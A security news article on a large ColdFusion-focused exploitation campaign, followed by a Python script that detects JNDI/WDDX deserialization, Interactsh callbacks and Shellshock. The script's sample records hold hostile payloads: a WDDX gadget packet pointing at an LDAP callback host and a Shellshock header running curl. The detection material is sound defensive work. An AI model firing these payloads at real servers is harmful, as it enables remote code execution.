Hackers Launch 2.5 Million+ Malicious Requests Targeting Adobe ColdFusion Servers

Security researchers have uncovered a massive coordinated exploitation campaign where threat actors launched over 2.5 million malicious requests against vulnerable systems during the Christmas 2025 holiday period.

The campaign represents a sophisticated, multi-faceted initial access broker operation targeting Adobe ColdFusion servers alongside 46 additional technology stacks across nearly 800 vulnerabilities.

The primary attack wave focused on 10+ Adobe ColdFusion CVEs, with researchers identifying just under 6,000 direct requests against ColdFusion infrastructure.

However, deeper analysis revealed the true scope: two primary IP addresses, geolocated to Japan and hosted by CTG Server Limited, generated over 2.5 million requests across 767 distinct CVEs, leveraging approximately 10,000 unique callback domains to verify which targets were exploitable.

The threat actors deliberately timed the campaign for maximum impact, concentrating 68 percent of attack traffic on Christmas Day when security teams typically operate at reduced capacity.

The timing suggests an operator familiar with enterprise security monitoring cycles rather than an opportunistic scanner.

[Figure: heatmap of request volume against Adobe ColdFusion over the holiday period]

The attackers used ProjectDiscovery Interactsh out-of-band callback infrastructure to verify successful exploitation attempts in real-time, enabling rapid identification of vulnerable systems suitable for follow-up compromise.

The campaign exploited critical vulnerabilities including CVE-2023-26359, a deserialization RCE affecting ColdFusion, which received 833 exploitation attempts.

CVE-2023-38205, an access control bypass, was targeted 654 times, while CVE-2023-44353 triggered 611 requests.

The primary attack vector was JNDI/LDAP injection through WDDX deserialization: a crafted WDDX packet instantiates the javax.sql.rowset.JdbcRowSetImpl gadget with a dataSourceName pointing at an attacker-controlled LDAP server, and the resulting JNDI lookup leads to remote code execution.

Beyond ColdFusion, the campaign demonstrates methodical reconnaissance across enterprise infrastructure.

Researchers at GreyNoise identified 4,118 unique HTTP fingerprints and observed targeting of Java application servers, web frameworks, CMS platforms, Atlassian products, network devices, and surveillance systems.

Confluence OGNL vulnerability CVE-2022-26134 alone received 12,481 requests, while the legacy Shellshock vulnerability CVE-2014-6271 triggered 8,527 attempts.

The threat actors operated from AS152194 (CTG Server Limited), a Hong Kong-registered hosting provider with documented associations to phishing infrastructure and spam operations.

Security researchers have also identified the network as hosting FUNNULL CDN infrastructure used against luxury brands. This abuse history, combined with the provider's rapid acquisition of IP space, suggests limited abuse enforcement.

Organizations operating Adobe ColdFusion servers should immediately apply security patches for CVE-2023-26359, CVE-2023-38205, and related vulnerabilities.

Security teams should implement network-based detection for JNDI injection payloads, OAST callback domains, and the identified threat actor IP addresses and JA4+ network fingerprints.
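The detection logic below is an added example, not code from GreyNoise or the report; it covers the WDDX/JdbcRowSetImpl vector described above, the Interactsh callback domains the attackers used for verification, and the per-source-IP counting that makes a two-IP campaign stand out. The request records, the Interactsh default parent domains, and the ColdFusion request shape are constructed assumptions for illustration: real Interactsh deployments can sit on any domain, so the static list is a starting point to pair with DNS-log review, not a complete signature.

```python
"""Flag HTTP requests carrying JNDI/WDDX deserialization payloads or OAST
callback domains. Added example; not GreyNoise's or Adobe's code."""
import json
import re
from collections import Counter
from typing import Optional
from urllib.parse import unquote_plus

# Default public Interactsh server domains (assumption: current defaults).
# Operators can run private servers on arbitrary domains, so this list
# catches the lazy case only; unknown high-entropy subdomains in DNS logs
# need their own anomaly check.
OAST_DOMAINS = ("oast.pro", "oast.live", "oast.site", "oast.online",
                "oast.fun", "oast.me", "interact.sh")
OAST_RE = re.compile(
    r"\b(?:[a-z0-9-]+\.)+(?:" + "|".join(map(re.escape, OAST_DOMAINS)) + r")\b",
    re.I)

# Markers of the WDDX -> JdbcRowSetImpl -> JNDI chain, a generic JNDI-scheme
# URI, and the Shellshock function-definition prefix seen in the same campaign.
INDICATORS = {
    "jndi_uri": re.compile(r"\b(?:ldaps?|rmi|iiop|dns)://[\w.:/%-]+", re.I),
    "wddx_packet": re.compile(r"<wddxPacket\b", re.I),
    "jdbcrowset_gadget": re.compile(r"javax\.sql\.rowset\.JdbcRowSetImpl", re.I),
    "jdbc_datasource_field": re.compile(r"\bdataSourceName\b", re.I),
    "shellshock": re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;"),
}


def normalize(text: str) -> str:
    """Undo up to three layers of URL encoding so encoded payloads still match.
    unquote_plus also turns '+' into a space, which is what form bodies need."""
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def inspect(record: dict) -> Optional[dict]:
    """Return indicator names and OAST domains found in one request record,
    or None when the request carries neither."""
    haystack = normalize(" ".join([
        record.get("path", ""),
        record.get("body", ""),
        " ".join(record.get("headers", {}).values()),
    ]))
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    domains = sorted({m.group(0).lower() for m in OAST_RE.finditer(haystack)})
    if not hits and not domains:
        return None
    return {"ip": record["ip"], "path": record["path"],
            "indicators": hits, "oast_domains": domains}


def scan(records):
    """Inspect every record; return the hits and a per-source-IP count."""
    hits = [h for h in map(inspect, records) if h]
    return hits, Counter(h["ip"] for h in hits)


# Constructed sample records (hypothetical IPs and callback hosts). Record 2
# mimics a URL-encoded WDDX body aimed at a ColdFusion .cfc endpoint; record 3
# mimics a Shellshock probe whose callback goes to an Interactsh host.
SAMPLE_LOG = [
    {"ip": "192.0.2.10", "path": "/index.cfm", "body": "",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    {"ip": "198.51.100.7", "path": "/cfusion/index.cfc?method=test&_cfclient=true",
     "body": ("argumentCollection=%3CwddxPacket+version%3D%221.0%22%3E%3Cdata%3E"
              "%3Cstruct+type%3D%22javax.sql.rowset.JdbcRowSetImpl%22%3E"
              "%3Cvar+name%3D%22dataSourceName%22%3E%3Cstring%3E"
              "ldap%3A%2F%2Fc0ffee.oast.fun%2Fx%3C%2Fstring%3E%3C%2Fvar%3E"
              "%3Cvar+name%3D%22autoCommit%22%3E%3Cboolean+value%3D%22true%22%2F%3E"
              "%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E"),
     "headers": {"User-Agent": "python-requests/2.31"}},
    {"ip": "198.51.100.7", "path": "/cgi-bin/status", "body": "",
     "headers": {"User-Agent": "() { :; }; /usr/bin/curl http://d3adb33f.interact.sh/"}},
]

if __name__ == "__main__":
    found, per_ip = scan(SAMPLE_LOG)
    for hit in found:
        print(json.dumps(hit))
    print("requests flagged per source IP:", dict(per_ip))
```

Run over real WAF or reverse-proxy records that include the request body; the access log alone will not show the POSTed WDDX packet. The per-IP counter is the cheap first pass: any source that trips several indicator families across many paths in a short window is behaving like the broker scanner described here, and its JA4+ fingerprint is then worth pinning down for a longer-lived block.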

Continuous vulnerability scanning and monitoring of exploitation attempt patterns remain critical defensive priorities.
